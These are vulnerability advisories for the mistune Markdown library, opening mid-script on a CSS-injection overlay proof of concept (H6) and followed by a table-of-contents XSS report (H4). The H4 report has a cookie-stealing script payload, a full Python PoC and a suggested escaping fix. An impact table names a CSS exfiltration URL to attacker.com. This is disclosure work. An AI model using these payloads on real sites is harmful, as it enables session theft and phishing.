# This single :width: value smuggles a full CSS attack chain: # position:fixed → overlay sits above the entire page # top/left/width/height → covers 100 % of the viewport # background-color:#e11d48 → vivid crimson fill # outline:8px solid #facc15 → bright yellow border # color:#fff → white alt-text label # z-index:9999 → on top of everything ex_file = "exploit_h6.md" ex_src = ( "```{image} x.jpg\n" ":width: 100vw;height:100vh;position:fixed;top:0;left:0;z-index:9999;" "background-color:#e11d48;outline:8px solid #facc15;color:#fff;opacity:.93\n" ":alt: ⚠ CSS INJECTED — click to dismiss ⚠\n" "```\n" ) with open(os.path.join(os.getcwd(), ex_file), "w") as f: f.write(ex_src) ex_out = str(md(ex_src)) print(f"[{ex_file}]\n{ex_src}") print("[output — colour + background-colour + fixed overlay injected into style=]") print(ex_out) # --- HTML report --- CSS = """ body{font-family:-apple-system,sans-serif;max-width:1200px;margin:40px auto;background:#f0f0f0;color:#111;padding:0 24px} h1{font-size:1.3em;border-bottom:3px solid #333;padding-bottom:8px;margin-bottom:4px} p.desc{color:#555;font-size:.9em;margin-top:6px} .warn{background:#fffbeb;border:1px solid #fbbf24;border-radius:6px;padding:10px 16px; font-size:.85em;color:#92400e;margin:12px 0} .case{margin:24px 0;border-radius:8px;overflow:hidden;border:1px solid #ccc; box-shadow:0 1px 4px rgba(0,0,0,.1)} .case-header{padding:10px 16px;font-weight:bold;font-family:monospace;font-size:.85em} .baseline .case-header{background:#d1fae5;color:#065f46} .exploit .case-header{background:#fee2e2;color:#7f1d1d} .panels{display:grid;grid-template-columns:1fr 1fr;background:#fff} .panel{padding:16px} .panel+.panel{border-left:1px solid #eee} .panel h3{margin:0 0 8px;font-size:.68em;color:#888;text-transform:uppercase;letter-spacing:.07em} pre{margin:0;padding:10px;background:#f6f6f6;border:1px solid #e0e0e0;border-radius:4px; font-size:.78em;white-space:pre-wrap;word-break:break-all} .rlabel{font-size:.68em;color:#aaa;margin:10px 0 
4px;font-family:monospace} .rendered{padding:12px;border:1px dashed #ccc;border-radius:4px;min-height:20px; background:#fff;font-size:.9em;position:relative;overflow:hidden;height:180px} /* scope the live-render sandbox so position:fixed stays inside the box */ .sandbox{position:relative;width:100%;height:100%} .sandbox img{max-width:100%;max-height:100%;object-fit:contain} /* override position:fixed on exploit img to keep it inside the preview box */ .sandbox img[style*="position:fixed"]{position:absolute!important;width:100%!important; height:100%!important;top:0!important;left:0!important} """ def case(kind, label, filename, src, out): header = "BASELINE" if kind == "baseline" else "EXPLOIT" sandbox = f'<div class="sandbox">{out}</div>' return f""" <div class="case {kind}"> <div class="case-header">{header} — {h.escape(label)}</div> <div class="panels"> <div class="panel"> <h3>Input — {h.escape(filename)}</h3> <pre>{h.escape(src)}</pre> </div> <div class="panel"> <h3>Output — HTML source</h3> <pre>{h.escape(out)}</pre> <div class="rlabel">↓ live render (sandboxed to preview box)</div> <div class="rendered">{sandbox}</div> </div> </div> </div>""" page = f"""<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"> <title>H6 — Image CSS Injection</title><style>{CSS}</style></head><body> <h1>H6 — Image Directive CSS Injection</h1> <p class="desc"> <code>_parse_attrs()</code> in <code>directives/image.py</code> validates <code>:width:</code> / <code>:height:</code> with <code>_num_re.match()</code> (prefix-only — no <code>$</code> anchor). Anything after the leading digits is accepted verbatim and written straight into a <code>style=</code> attribute. A single <code>:width:</code> option is sufficient to smuggle an arbitrary CSS chain: <strong>position:fixed · background-color · outline colour · full-viewport overlay</strong>. </p> <div class="warn"> ⚠ The EXPLOIT preview below is sandboxed inside its box. 
In a real document the crimson overlay would cover the <em>entire browser window</em>. </div> {case("baseline", "Integer dims → clean width/height= attributes, no style=", bl_file, bl_src, bl_out)} {case("exploit", ":width: carries position:fixed + background-color + outline → full-viewport coloured overlay", ex_file, ex_src, ex_out)} </body></html>""" out_path = os.path.join(os.getcwd(), "report_h6.html") with open(out_path, "w") as f: f.write(page) print(f"\n[report] {out_path}") ``` Example usage: ```bash python poc.py ``` Once you run the script, open `report_h6.html` in the browser and observe the behaviour. ## Impact | Dimension | Assessment | |------------------|-----------| | **Confidentiality** | CSS-based data exfiltration via `background-image: url(https://attacker.com/?leak=...)` is possible in some browser/CSP configurations | | **Integrity** | Full-viewport overlay enables complete UI replacement: phishing login forms, fake alerts, click-jacking, brand impersonation | | **Availability** | The overlay obscures all page content from the user until dismissed or navigated away | **Real-world impact scenario:** An attacker posts a Markdown document to a platform (wiki, issue tracker, documentation site) that renders mistune with the Image directive. Any user who views the page sees a full-screen crimson overlay matching the attacker's design, replacing or concealing the legitimate page content. The overlay can contain a convincing login prompt, survey form, or urgent warning designed to capture credentials.
- CVE-2026-44898 · May 14, 2026 · risk 0.00 · cvss — · epss —
## Summary

`render_toc_ul()` builds a `<ul>` table-of-contents tree from a list of `(level, id, text)` tuples. Both the `id` value (used as `href="#<id>"`) and the `text` value (used as the visible link label) are inserted into `<a>` tags via a plain Python format string — with no HTML escaping applied to either value.

When heading IDs are derived from user-supplied heading text (the standard use-case for readable slug anchors), an attacker can craft a heading whose text breaks out of the `href="#..."` attribute context, injecting arbitrary HTML tags including `<script>` blocks directly into the rendered TOC.

This vulnerability is closely related to H2 (unescaped `id=` in `heading()`): the same `heading_id` callback pattern that triggers H2 also populates the `toc_items` list that `render_toc_ul()` consumes, meaning both vulnerabilities fire simultaneously in a typical documentation setup.

## Details

**File:** `src/mistune/toc.py`

```python
def render_toc_ul(toc):
    ...
    for level, k, text in toc:
        # k    = heading id   (used verbatim as href fragment)
        # text = heading text (used verbatim as link label)
        item = '<a href="#{}">{}</a>'.format(k, text)
        # Neither k nor text is passed through escape() at any point
```

The `k` and `text` values come directly from the `toc_items` list accumulated during parsing. If `k` contains `"` or `>`, the `href` attribute is broken. If `text` contains `<`, raw tags are injected as the visible link content.

## PoC

**Step 1 — Establish the baseline (safe default IDs)**

The script creates a parser with `escape=True` and the default `add_toc_hook()` (no custom callback).
The default hook assigns sequential numeric IDs that never contain user text:

```python
md_safe = create_markdown(escape=True)
add_toc_hook(md_safe)

bl_src = "# Introduction\n\n## Installation\n"
_, state = md_safe.parse(bl_src)
bl_out = render_toc_ul(state.env.get("toc_items", []))
```

Output — clean, safe TOC:

```html
<ul>
<li><a href="#toc_1">Introduction</a>
<ul>
<li><a href="#toc_2">Installation</a></li>
</ul>
</li>
</ul>
```

**Step 2 — Enable the vulnerable `heading_id` callback**

Register a callback that returns the raw heading text as the ID. This is the standard slug-based anchor pattern used by documentation generators:

```python
def raw_id(token, index):
    return token.get("text", "")

md_vuln = create_markdown(escape=True)
add_toc_hook(md_vuln, heading_id=raw_id)
```

**Step 3 — Craft the exploit payload**

Construct a heading whose text terminates the `href="#..."` attribute and injects a `<script>` block followed by a dangling `<a href="` to absorb the closing `">` that `render_toc_ul` appends:

```
## x"><script>alert(document.cookie)</script><a href="
```

When `raw_id` processes this heading, it returns the entire text as the ID: `x"><script>alert(document.cookie)</script><a href="`.

**Step 4 — Observe script injection in the TOC output**

```python
ex_src = '## x"><script>alert(document.cookie)</script><a href="\n'
_, state = md_vuln.parse(ex_src)
ex_out = render_toc_ul(state.env.get("toc_items", []))
```

`render_toc_ul()` formats the malicious ID directly into the `<a href>`:

```python
'<a href="#{}">{}</a>'.format(k, text)
# becomes:
'<a href="#x"><script>alert(document.cookie)</script><a href="">...</a>'
```

Actual output:

```html
<ul>
<li><a href="#x"><script>alert(document.cookie)</script><a href="">x"><script>alert(document.cookie)</script><a href="</a></li>
</ul>
```

The `<script>` block is live in the document.
Note that the anchor *label* (`text`) is escaped correctly by mistune's inline renderer before it reaches `toc_items`, but `k` (the heading ID) is not escaped anywhere.

### Script

I have built a script that you can use to verify this. It creates an HTML page showing the bypass so that you can see it render in the browser.

```python
#!/usr/bin/env python3
"""H4: render_toc_ul() puts raw heading ID into <a href> without escaping."""
import os, html as h
from mistune import create_markdown
from mistune.toc import add_toc_hook, render_toc_ul


def raw_id(token, index):
    return token.get("text", "")


# --- baseline ---
md_safe = create_markdown(escape=True)
add_toc_hook(md_safe)

bl_file = "baseline_h4.md"
bl_src = "# Introduction\n\n## Installation\n"
with open(os.path.join(os.getcwd(), bl_file), "w") as f:
    f.write(bl_src)
_, state = md_safe.parse(bl_src)
bl_out = render_toc_ul(state.env.get("toc_items", []))
print(f"[{bl_file}]\n{bl_src}")
print("[toc output — safe]")
print(bl_out)

# --- exploit ---
md_vuln = create_markdown(escape=True)
add_toc_hook(md_vuln, heading_id=raw_id)

ex_file = "exploit_h4.md"
ex_src = '## x"><script>alert(document.cookie)</script><a href="\n'
with open(os.path.join(os.getcwd(), ex_file), "w") as f:
    f.write(ex_src)
_, state = md_vuln.parse(ex_src)
ex_out = render_toc_ul(state.env.get("toc_items", []))
print(f"[{ex_file}]\n{ex_src}")
print("[toc output — script injected via href breakout]")
print(ex_out)

# --- HTML report ---
CSS = """
body{font-family:-apple-system,sans-serif;max-width:1200px;margin:40px auto;background:#f0f0f0;color:#111;padding:0 24px}
h1{font-size:1.3em;border-bottom:3px solid #333;padding-bottom:8px;margin-bottom:4px}
p.desc{color:#555;font-size:.9em;margin-top:6px}
.case{margin:24px 0;border-radius:8px;overflow:hidden;border:1px solid #ccc;box-shadow:0 1px 4px rgba(0,0,0,.1)}
.case-header{padding:10px 16px;font-weight:bold;font-family:monospace;font-size:.85em}
.baseline .case-header{background:#d1fae5;color:#065f46}
.exploit .case-header{background:#fee2e2;color:#7f1d1d}
.panels{display:grid;grid-template-columns:1fr 1fr;background:#fff}
.panel{padding:16px}
.panel+.panel{border-left:1px solid #eee}
.panel h3{margin:0 0 8px;font-size:.68em;color:#888;text-transform:uppercase;letter-spacing:.07em}
pre{margin:0;padding:10px;background:#f6f6f6;border:1px solid #e0e0e0;border-radius:4px;font-size:.78em;white-space:pre-wrap;word-break:break-all}
.rlabel{font-size:.68em;color:#aaa;margin:10px 0 4px;font-family:monospace}
.rendered{padding:12px;border:1px dashed #ccc;border-radius:4px;min-height:20px;background:#fff;font-size:.9em}
"""


def case(kind, label, filename, src, out):
    return f"""
<div class="case {kind}">
  <div class="case-header">{'BASELINE' if kind=='baseline' else 'EXPLOIT'} — {h.escape(label)}</div>
  <div class="panels">
    <div class="panel">
      <h3>Input — {h.escape(filename)}</h3>
      <pre>{h.escape(src)}</pre>
    </div>
    <div class="panel">
      <h3>TOC output — HTML source</h3>
      <pre>{h.escape(out)}</pre>
      <div class="rlabel">↓ rendered in browser</div>
      <div class="rendered">{out}</div>
    </div>
  </div>
</div>"""


page = f"""<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8">
<title>H4 — TOC XSS</title><style>{CSS}</style></head><body>
<h1>H4 — TOC render_toc_ul() XSS</h1>
<p class="desc">render_toc_ul() in toc.py uses '<a href="#{{}}">{{}}</a>'.format(k, text) — neither k (the heading ID) nor text is escaped before insertion.</p>
{case("baseline", "Normal headings → sequential IDs → clean TOC links", bl_file, bl_src, bl_out)}
{case("exploit", "Malicious heading ID breaks out of href='#...' → script injected", ex_file, ex_src, ex_out)}
</body></html>"""

out_path = os.path.join(os.getcwd(), "report_h4.html")
with open(out_path, "w") as f:
    f.write(page)
print(f"\n[report] {out_path}")
```

Example usage:

```bash
python poc.py
```

Once you run the script, open `report_h4.html` in the browser and observe the behaviour.
## Impact

| Dimension | Assessment |
|------------------|-----------|
| **Confidentiality** | JavaScript execution; attacker can exfiltrate session cookies and any data accessible from the page's origin |
| **Integrity** | Arbitrary DOM manipulation, phishing form injection, forced redirects |
| **Availability** | Page crash or freeze is possible as a secondary effect |

**Risk context:** TOC generation is a rendering step that often happens in a different template layer from the main body render, so it may be reviewed separately and trusted implicitly. Vulnerabilities in TOC output are frequently overlooked in code review. Combined with H2, an attacker exploiting this via a single malicious heading simultaneously injects into both the heading element and the TOC anchor.
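
As a rough illustration of how the `href` breakout could be closed off, the sketch below uses only the Python standard library. Both functions are hypothetical and not part of Mistune: `render_toc_link` escapes the ID and the label before formatting, and `slug_id` reduces heading text to a conservative slug. If the label already arrives escaped, as the note above states, escaping it a second time would double-encode entities, so a real fix would likely escape only the ID.

```python
import html
import re


def render_toc_link(heading_id: str, text: str) -> str:
    """Hypothetical escaped variant of the '<a href="#{}">{}</a>' format call."""
    return '<a href="#{}">{}</a>'.format(
        html.escape(heading_id, quote=True),  # quotes and angle brackets become entities
        html.escape(text, quote=True),
    )


def slug_id(raw_text: str, index: int) -> str:
    """Hypothetical slug builder: keep [a-z0-9], collapse everything else to '-'."""
    slug = re.sub(r"[^a-z0-9]+", "-", raw_text.lower()).strip("-")
    # Fall back to a sequential ID when nothing usable remains.
    return slug or "toc_{}".format(index + 1)


payload = 'x"><script>alert(document.cookie)</script><a href="'
print(render_toc_link(payload, "label"))
print(slug_id(payload, 0))
```

A callback in the shape used by the PoC could wrap the slug helper, for example `lambda token, index: slug_id(token.get("text", ""), index)`, so that the ID never carries quotes or angle brackets in the first place.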
- CVE-2026-33441 · May 6, 2026 · risk 0.00 · cvss — · epss —
Rejected reason: This CVE is a duplicate of another CVE: CVE-2026-33079.